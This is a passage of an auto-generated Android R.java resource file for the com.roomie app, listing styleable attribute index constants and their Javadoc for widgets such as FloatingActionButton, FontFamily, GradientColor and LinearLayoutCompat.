"<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:fabCustomSize */ public static final int FloatingActionButton_fabCustomSize = 7; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#fabSize} attribute's value can be found in the {@link #FloatingActionButton} array. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>auto</code></td><td>-1</td><td></td></tr> <tr><td><code>normal</code></td><td>0</td><td></td></tr> <tr><td><code>mini</code></td><td>1</td><td></td></tr> </table> @attr name com.roomie:fabSize */ public static final int FloatingActionButton_fabSize = 6; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#hideMotionSpec} attribute's value can be found in the {@link #FloatingActionButton} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:hideMotionSpec */ public static final int FloatingActionButton_hideMotionSpec = 3; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#hoveredFocusedTranslationZ} attribute's value can be found in the {@link #FloatingActionButton} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:hoveredFocusedTranslationZ */ public static final int FloatingActionButton_hoveredFocusedTranslationZ = 8; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#maxImageSize} attribute's value can be found in the {@link #FloatingActionButton} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:maxImageSize */ public static final int FloatingActionButton_maxImageSize = 12; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#pressedTranslationZ} attribute's value can be found in the {@link #FloatingActionButton} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:pressedTranslationZ */ public static final int FloatingActionButton_pressedTranslationZ = 9; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#rippleColor} attribute's value can be found in the {@link #FloatingActionButton} array. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:rippleColor */ public static final int FloatingActionButton_rippleColor = 4; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#showMotionSpec} attribute's value can be found in the {@link #FloatingActionButton} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:showMotionSpec */ public static final int FloatingActionButton_showMotionSpec = 5; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#useCompatPadding} attribute's value can be found in the {@link #FloatingActionButton} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:useCompatPadding */ public static final int FloatingActionButton_useCompatPadding = 11; /** Attributes that can be used with a FloatingActionButton_Behavior_Layout. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #FloatingActionButton_Behavior_Layout_behavior_autoHide com.roomie:behavior_autoHide}</code></td><td></td></tr> </table> @see #FloatingActionButton_Behavior_Layout_behavior_autoHide */ public static final int[] FloatingActionButton_Behavior_Layout = { 0x7f010192 }; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#behavior_autoHide} attribute's value can be found in the {@link #FloatingActionButton_Behavior_Layout} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:behavior_autoHide */ public static final int FloatingActionButton_Behavior_Layout_behavior_autoHide = 0; /** Attributes that can be used with a FlowLayout. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #FlowLayout_itemSpacing com.roomie:itemSpacing}</code></td><td></td></tr> <tr><td><code>{@link #FlowLayout_lineSpacing com.roomie:lineSpacing}</code></td><td></td></tr> </table> @see #FlowLayout_itemSpacing @see #FlowLayout_lineSpacing */ public static final int[] FlowLayout = { 0x7f010193, 0x7f010194 }; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#itemSpacing} attribute's value can be found in the {@link #FlowLayout} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:itemSpacing */ public static final int FlowLayout_itemSpacing = 0; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#lineSpacing} attribute's value can be found in the {@link #FlowLayout} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:lineSpacing */ public static final int FlowLayout_lineSpacing = 1; /** Attributes that can be used with a FontFamily. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #FontFamily_fontProviderAuthority com.roomie:fontProviderAuthority}</code></td><td> The authority of the Font Provider to be used for the request.</td></tr> <tr><td><code>{@link #FontFamily_fontProviderCerts com.roomie:fontProviderCerts}</code></td><td> The sets of hashes for the certificates the provider should be signed with.</td></tr> <tr><td><code>{@link #FontFamily_fontProviderFetchStrategy com.roomie:fontProviderFetchStrategy}</code></td><td> The strategy to be used when fetching font data from a font provider in XML layouts.</td></tr> <tr><td><code>{@link #FontFamily_fontProviderFetchTimeout com.roomie:fontProviderFetchTimeout}</code></td><td> The length of the timeout during fetching.</td></tr> <tr><td><code>{@link #FontFamily_fontProviderPackage com.roomie:fontProviderPackage}</code></td><td> The package for the Font Provider to be used for the request.</td></tr> <tr><td><code>{@link #FontFamily_fontProviderQuery com.roomie:fontProviderQuery}</code></td><td> The query to be sent over to the provider.</td></tr> </table> @see #FontFamily_fontProviderAuthority @see #FontFamily_fontProviderCerts @see #FontFamily_fontProviderFetchStrategy @see #FontFamily_fontProviderFetchTimeout @see #FontFamily_fontProviderPackage @see #FontFamily_fontProviderQuery */ public static final int[] FontFamily = { 0x7f0101e6, 0x7f0101e7, 0x7f0101e8, 0x7f0101e9, 0x7f0101ea, 0x7f0101eb }; /** <p> @attr description The authority of the Font Provider to be used for the request. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:fontProviderAuthority */ public static final int FontFamily_fontProviderAuthority = 0; /** <p> @attr description The sets of hashes for the certificates the provider should be signed with. This is used to verify the identity of the provider, and is only required if the provider is not part of the system image. This value may point to one list or a list of lists, where each individual list represents one collection of signature hashes. Refer to your font provider's documentation for these values. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:fontProviderCerts */ public static final int FontFamily_fontProviderCerts = 3; /** <p> @attr description The strategy to be used when fetching font data from a font provider in XML layouts. This attribute is ignored when the resource is loaded from code, as it is equivalent to the choice of API between {@link androidx.core.content.res.ResourcesCompat#getFont(Context, int)} (blocking) and {@link androidx.core.content.res.ResourcesCompat#getFont(Context, int, FontCallback, Handler)} (async). <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>blocking</code></td><td>0</td><td> The blocking font fetch works as follows. First, check the local cache, then if the requested font is not cached, request the font from the provider and wait until it is finished. You can change the length of the timeout by modifying fontProviderFetchTimeout. If the timeout happens, the default typeface will be used instead. </td></tr> <tr><td><code>async</code></td><td>1</td><td> The async font fetch works as follows. First, check the local cache, then if the requeted font is not cached, trigger a request the font and continue with layout inflation. Once the font fetch succeeds, the target text view will be refreshed with the downloaded font data. The fontProviderFetchTimeout will be ignored if async loading is specified. </td></tr> </table> <p>This is a private symbol. @attr name com.roomie:fontProviderFetchStrategy */ public static final int FontFamily_fontProviderFetchStrategy = 4; /** <p> @attr description The length of the timeout during fetching. <p>May be an integer value, such as "<code>100</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>May be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>forever</code></td><td>-1</td><td> A special value for the timeout. In this case, the blocking font fetching will not timeout and wait until a reply is received from the font provider. </td></tr> </table> <p>This is a private symbol. @attr name com.roomie:fontProviderFetchTimeout */ public static final int FontFamily_fontProviderFetchTimeout = 5; /** <p> @attr description The package for the Font Provider to be used for the request. This is used to verify the identity of the provider. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:fontProviderPackage */ public static final int FontFamily_fontProviderPackage = 1; /** <p> @attr description The query to be sent over to the provider. Refer to your font provider's documentation on the format of this string. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:fontProviderQuery */ public static final int FontFamily_fontProviderQuery = 2; /** Attributes that can be used with a FontFamilyFont. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #FontFamilyFont_android_font android:font}</code></td><td></td></tr> <tr><td><code>{@link #FontFamilyFont_android_fontStyle android:fontStyle}</code></td><td> References to the framework attrs </td></tr> <tr><td><code>{@link #FontFamilyFont_android_fontVariationSettings android:fontVariationSettings}</code></td><td></td></tr> <tr><td><code>{@link #FontFamilyFont_android_fontWeight android:fontWeight}</code></td><td></td></tr> <tr><td><code>{@link #FontFamilyFont_android_ttcIndex android:ttcIndex}</code></td><td></td></tr> <tr><td><code>{@link #FontFamilyFont_font com.roomie:font}</code></td><td> The reference to the font file to be used.</td></tr> <tr><td><code>{@link #FontFamilyFont_fontStyle com.roomie:fontStyle}</code></td><td> The style of the given font file.</td></tr> <tr><td><code>{@link #FontFamilyFont_fontVariationSettings com.roomie:fontVariationSettings}</code></td><td> The variation settings to be applied to the font.</td></tr> <tr><td><code>{@link #FontFamilyFont_fontWeight com.roomie:fontWeight}</code></td><td> The weight of the given font file.</td></tr> <tr><td><code>{@link #FontFamilyFont_ttcIndex com.roomie:ttcIndex}</code></td><td> The index of the font in the tcc font file.</td></tr> </table> @see #FontFamilyFont_android_font @see #FontFamilyFont_android_fontStyle @see #FontFamilyFont_android_fontVariationSettings @see #FontFamilyFont_android_fontWeight @see #FontFamilyFont_android_ttcIndex @see #FontFamilyFont_font @see #FontFamilyFont_fontStyle @see #FontFamilyFont_fontVariationSettings @see #FontFamilyFont_fontWeight @see #FontFamilyFont_ttcIndex */ public static final int[] FontFamilyFont = { 0x01010532, 0x01010533, 0x0101053f, 0x0101056f, 0x01010570, 0x7f0101ec, 0x7f0101ed, 0x7f0101ee, 0x7f0101ef, 0x7f0101f0 }; /** <p>This symbol is the offset where the {@link android.R.attr#font} attribute's value can be found in the {@link #FontFamilyFont} array. @attr name android:font */ public static final int FontFamilyFont_android_font = 0; /** <p> @attr description References to the framework attrs <p>This corresponds to the global attribute resource symbol {@link android.R.attr#fontStyle}. @attr name android:fontStyle */ public static final int FontFamilyFont_android_fontStyle = 2; /** <p>This symbol is the offset where the {@link android.R.attr#fontVariationSettings} attribute's value can be found in the {@link #FontFamilyFont} array. @attr name android:fontVariationSettings */ public static final int FontFamilyFont_android_fontVariationSettings = 4; /** <p>This symbol is the offset where the {@link android.R.attr#fontWeight} attribute's value can be found in the {@link #FontFamilyFont} array. @attr name android:fontWeight */ public static final int FontFamilyFont_android_fontWeight = 1; /** <p>This symbol is the offset where the {@link android.R.attr#ttcIndex} attribute's value can be found in the {@link #FontFamilyFont} array. @attr name android:ttcIndex */ public static final int FontFamilyFont_android_ttcIndex = 3; /** <p> @attr description The reference to the font file to be used. This should be a file in the res/font folder and should therefore have an R reference value. E.g. @font/myfont <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:font */ public static final int FontFamilyFont_font = 6; /** <p> @attr description The style of the given font file. This will be used when the font is being loaded into the font stack and will override any style information in the font's header tables. If unspecified, the value in the font's header tables will be used. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>normal</code></td><td>0</td><td></td></tr> <tr><td><code>italic</code></td><td>1</td><td></td></tr> </table> <p>This is a private symbol. @attr name com.roomie:fontStyle */ public static final int FontFamilyFont_fontStyle = 5; /** <p> @attr description The variation settings to be applied to the font. The string should be in the following format: "'tag1' value1, 'tag2' value2, ...". If the default variation settings should be used, or the font used does not support variation settings, this attribute needs not be specified. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:fontVariationSettings */ public static final int FontFamilyFont_fontVariationSettings = 8; /** <p> @attr description The weight of the given font file. This will be used when the font is being loaded into the font stack and will override any weight information in the font's header tables. Must be a positive number, a multiple of 100, and between 100 and 900, inclusive. The most common values are 400 for regular weight and 700 for bold weight. If unspecified, the value in the font's header tables will be used. <p>Must be an integer value, such as "<code>100</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:fontWeight */ public static final int FontFamilyFont_fontWeight = 7; /** <p> @attr description The index of the font in the tcc font file. If the font file referenced is not in the tcc format, this attribute needs not be specified. <p>Must be an integer value, such as "<code>100</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:ttcIndex */ public static final int FontFamilyFont_ttcIndex = 9; /** Attributes that can be used with a ForegroundLinearLayout. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #ForegroundLinearLayout_android_foreground android:foreground}</code></td><td></td></tr> <tr><td><code>{@link #ForegroundLinearLayout_android_foregroundGravity android:foregroundGravity}</code></td><td></td></tr> <tr><td><code>{@link #ForegroundLinearLayout_foregroundInsidePadding com.roomie:foregroundInsidePadding}</code></td><td></td></tr> </table> @see #ForegroundLinearLayout_android_foreground @see #ForegroundLinearLayout_android_foregroundGravity @see #ForegroundLinearLayout_foregroundInsidePadding */ public static final int[] ForegroundLinearLayout = { 0x01010109, 0x01010200, 0x7f010195 }; /** <p>This symbol is the offset where the {@link android.R.attr#foreground} attribute's value can be found in the {@link #ForegroundLinearLayout} array. @attr name android:foreground */ public static final int ForegroundLinearLayout_android_foreground = 0; /** <p>This symbol is the offset where the {@link android.R.attr#foregroundGravity} attribute's value can be found in the {@link #ForegroundLinearLayout} array. @attr name android:foregroundGravity */ public static final int ForegroundLinearLayout_android_foregroundGravity = 1; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#foregroundInsidePadding} attribute's value can be found in the {@link #ForegroundLinearLayout} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:foregroundInsidePadding */ public static final int ForegroundLinearLayout_foregroundInsidePadding = 2; /** Attributes that can be used with a GradientColor. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #GradientColor_android_centerColor android:centerColor}</code></td><td> Optional center color.</td></tr> <tr><td><code>{@link #GradientColor_android_centerX android:centerX}</code></td><td> Only applied to SweepGradient / RadialGradient X coordinate of the center of the gradient within the path.</td></tr> <tr><td><code>{@link #GradientColor_android_centerY android:centerY}</code></td><td> Y coordinate of the center of the gradient within the path.</td></tr> <tr><td><code>{@link #GradientColor_android_endColor android:endColor}</code></td><td> End color of the gradient.</td></tr> <tr><td><code>{@link #GradientColor_android_endX android:endX}</code></td><td> X coordinate of the end point origin of the gradient.</td></tr> <tr><td><code>{@link #GradientColor_android_endY android:endY}</code></td><td> Y coordinate of the end point of the gradient within the shape.</td></tr> <tr><td><code>{@link #GradientColor_android_gradientRadius android:gradientRadius}</code></td><td> Only applied to RadialGradient Radius of the gradient, used only with radial gradient.</td></tr> <tr><td><code>{@link #GradientColor_android_startColor android:startColor}</code></td><td> Start color of the gradient.</td></tr> <tr><td><code>{@link #GradientColor_android_startX android:startX}</code></td><td> LinearGradient specific X coordinate of the start point origin of the gradient.</td></tr> <tr><td><code>{@link #GradientColor_android_startY android:startY}</code></td><td> Y coordinate of the start point of the gradient within the shape.</td></tr> <tr><td><code>{@link #GradientColor_android_tileMode android:tileMode}</code></td><td> Defines the tile mode of the gradient.</td></tr> <tr><td><code>{@link #GradientColor_android_type android:type}</code></td><td> Type of gradient.</td></tr> </table> @see #GradientColor_android_centerColor @see #GradientColor_android_centerX @see #GradientColor_android_centerY @see #GradientColor_android_endColor @see #GradientColor_android_endX @see #GradientColor_android_endY @see #GradientColor_android_gradientRadius @see #GradientColor_android_startColor @see #GradientColor_android_startX @see #GradientColor_android_startY @see #GradientColor_android_tileMode @see #GradientColor_android_type */ public static final int[] GradientColor = { 0x0101019d, 0x0101019e, 0x010101a1, 0x010101a2, 0x010101a3, 0x010101a4, 0x01010201, 0x0101020b, 0x01010510, 0x01010511, 0x01010512, 0x01010513 }; /** <p> @attr description Optional center color. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#centerColor}. @attr name android:centerColor */ public static final int GradientColor_android_centerColor = 7; /** <p> @attr description Only applied to SweepGradient / RadialGradient X coordinate of the center of the gradient within the path. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#centerX}. @attr name android:centerX */ public static final int GradientColor_android_centerX = 3; /** <p> @attr description Y coordinate of the center of the gradient within the path. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#centerY}. @attr name android:centerY */ public static final int GradientColor_android_centerY = 4; /** <p> @attr description End color of the gradient. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#endColor}. @attr name android:endColor */ public static final int GradientColor_android_endColor = 1; /** <p> @attr description X coordinate of the end point origin of the gradient. Defined in same coordinates as the path itself <p>This corresponds to the global attribute resource symbol {@link android.R.attr#endX}. @attr name android:endX */ public static final int GradientColor_android_endX = 10; /** <p> @attr description Y coordinate of the end point of the gradient within the shape. Defined in same coordinates as the path itself <p>This corresponds to the global attribute resource symbol {@link android.R.attr#endY}. @attr name android:endY */ public static final int GradientColor_android_endY = 11; /** <p> @attr description Only applied to RadialGradient Radius of the gradient, used only with radial gradient. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#gradientRadius}. @attr name android:gradientRadius */ public static final int GradientColor_android_gradientRadius = 5; /** <p> @attr description Start color of the gradient. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#startColor}. @attr name android:startColor */ public static final int GradientColor_android_startColor = 0; /** <p> @attr description LinearGradient specific X coordinate of the start point origin of the gradient. Defined in same coordinates as the path itself <p>This corresponds to the global attribute resource symbol {@link android.R.attr#startX}. @attr name android:startX */ public static final int GradientColor_android_startX = 8; /** <p> @attr description Y coordinate of the start point of the gradient within the shape. Defined in same coordinates as the path itself <p>This corresponds to the global attribute resource symbol {@link android.R.attr#startY}. @attr name android:startY */ public static final int GradientColor_android_startY = 9; /** <p> @attr description Defines the tile mode of the gradient. SweepGradient doesn't support tiling. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#tileMode}. @attr name android:tileMode */ public static final int GradientColor_android_tileMode = 6; /** <p> @attr description Type of gradient. The default type is linear. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#type}. @attr name android:type */ public static final int GradientColor_android_type = 2; /** Attributes that can be used with a GradientColorItem. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #GradientColorItem_android_color android:color}</code></td><td> The current color for the offset inside the gradient.</td></tr> <tr><td><code>{@link #GradientColorItem_android_offset android:offset}</code></td><td> The offset (or ratio) of this current color item inside the gradient.</td></tr> </table> @see #GradientColorItem_android_color @see #GradientColorItem_android_offset */ public static final int[] GradientColorItem = { 0x010101a5, 0x01010514 }; /** <p> @attr description The current color for the offset inside the gradient. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#color}. @attr name android:color */ public static final int GradientColorItem_android_color = 0; /** <p> @attr description The offset (or ratio) of this current color item inside the gradient. The value is only meaningful when it is between 0 and 1. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#offset}. @attr name android:offset */ public static final int GradientColorItem_android_offset = 1; /** Attributes that can be used with a LinearLayoutCompat. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #LinearLayoutCompat_android_baselineAligned android:baselineAligned}</code></td><td> When set to false, prevents the layout from aligning its children's baselines.</td></tr> <tr><td><code>{@link #LinearLayoutCompat_android_baselineAlignedChildIndex android:baselineAlignedChildIndex}</code></td><td> When a linear layout is part of another layout that is baseline aligned, it can specify which of its children to baseline align to (that is, which child TextView).</td></tr> <tr><td><code>{@link #LinearLayoutCompat_android_gravity android:gravity}</code></td><td></td></tr> <tr><td><code>{@link #LinearLayoutCompat_android_orientation android:orientation}</code></td><td> Should the layout be a column or a row? Use "horizontal" for a row, "vertical" for a column.</td></tr> <tr><td><code>{@link #LinearLayoutCompat_android_weightSum android:weightSum}</code></td><td> Defines the maximum weight sum.</td></tr> <tr><td><code>{@link #LinearLayoutCompat_divider com.roomie:divider}</code></td><td> Drawable to use as a vertical divider between buttons.</td></tr> <tr><td><code>{@link #LinearLayoutCompat_dividerPadding com.roomie:dividerPadding}</code></td><td> Size of padding on either end of a divider.</td></tr> <tr><td><code>{@link #LinearLayoutCompat_measureWithLargestChild com.roomie:measureWithLargestChild}</code></td><td> When set to true, all children with a weight will be considered having the minimum size of the largest child.</td></tr> <tr><td><code>{@link #LinearLayoutCompat_showDividers com.roomie:showDividers}</code></td><td> Setting for which dividers to show.</td></tr> </table> @see #LinearLayoutCompat_android_baselineAligned @see #LinearLayoutCompat_android_baselineAlignedChildIndex @see #LinearLayoutCompat_android_gravity @see #LinearLayoutCompat_android_orientation @see #LinearLayoutCompat_android_weightSum @see #LinearLayoutCompat_divider @see #LinearLayoutCompat_dividerPadding @see #LinearLayoutCompat_measureWithLargestChild @see #LinearLayoutCompat_showDividers */ public static final int[] LinearLayoutCompat = { 0x010100af, 0x010100c4, 0x01010126, 0x01010127, 0x01010128, 0x7f010034, 0x7f0100e3, 0x7f0100e4, 0x7f0100e5 }; /** <p> @attr description When set to false, prevents the layout from aligning its children's baselines. This attribute is particularly useful when the children use different values for gravity. The default value is true. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#baselineAligned}. @attr name android:baselineAligned */ public static final int LinearLayoutCompat_android_baselineAligned = 2; /** <p> @attr description When a linear layout is part of another layout that is baseline aligned, it can specify which of its children to baseline align to (that is, which child TextView). <p>This corresponds to the global attribute resource symbol {@link android.R.attr#baselineAlignedChildIndex}. @attr name android:baselineAlignedChildIndex */ public static final int LinearLayoutCompat_android_baselineAlignedChildIndex = 3; /** <p>This symbol is the offset where the {@link android.R.attr#gravity} attribute's value can be found in the {@link #LinearLayoutCompat} array. @attr name android:gravity */ public static final int LinearLayoutCompat_android_gravity = 0; /** <p> @attr description Should the layout be a column or a row? Use "horizontal" for a row, "vertical" for a column. The default is horizontal. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#orientation}. @attr name android:orientation */ public static final int LinearLayoutCompat_android_orientation = 1; /** <p> @attr description Defines the maximum weight sum. If unspecified, the sum is computed by adding the layout_weight of all of the children. This can be used for instance to give a single child 50% of the total available space by giving it a layout_weight of 0.5 and setting the weightSum to 1.0. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#weightSum}. @attr name android:weightSum */ public static final int LinearLayoutCompat_android_weightSum = 4; /** <p> @attr description Drawable to use as a vertical divider between buttons. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:divider */ public static final int LinearLayoutCompat_divider = 5; /** <p> @attr description Size of padding on either end of a divider. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:dividerPadding */ public static final int LinearLayoutCompat_dividerPadding = 8; /** <p> @attr description When set to true, all children with a weight will be considered having the minimum size of the largest child. If false, all children are measured normally. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:measureWithLargestChild */ public static final int LinearLayoutCompat_measureWithLargestChild = 6; /** <p> @attr description Setting for which dividers to show. <p>Must be one or more (separated by '|') of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>none</code></td><td>0</td><td></td></tr> <tr><td><code>beginning</code></td><td>1</td><td></td></tr> <tr><td><code>middle</code></td><td>2</td><td></td></tr> <tr><td><code>end</code></td><td>4</td><td></td></tr> </table> <p>This is a private symbol. @attr name com.roomie:showDividers */ public static final int LinearLayoutCompat_showDividers = 7; /** 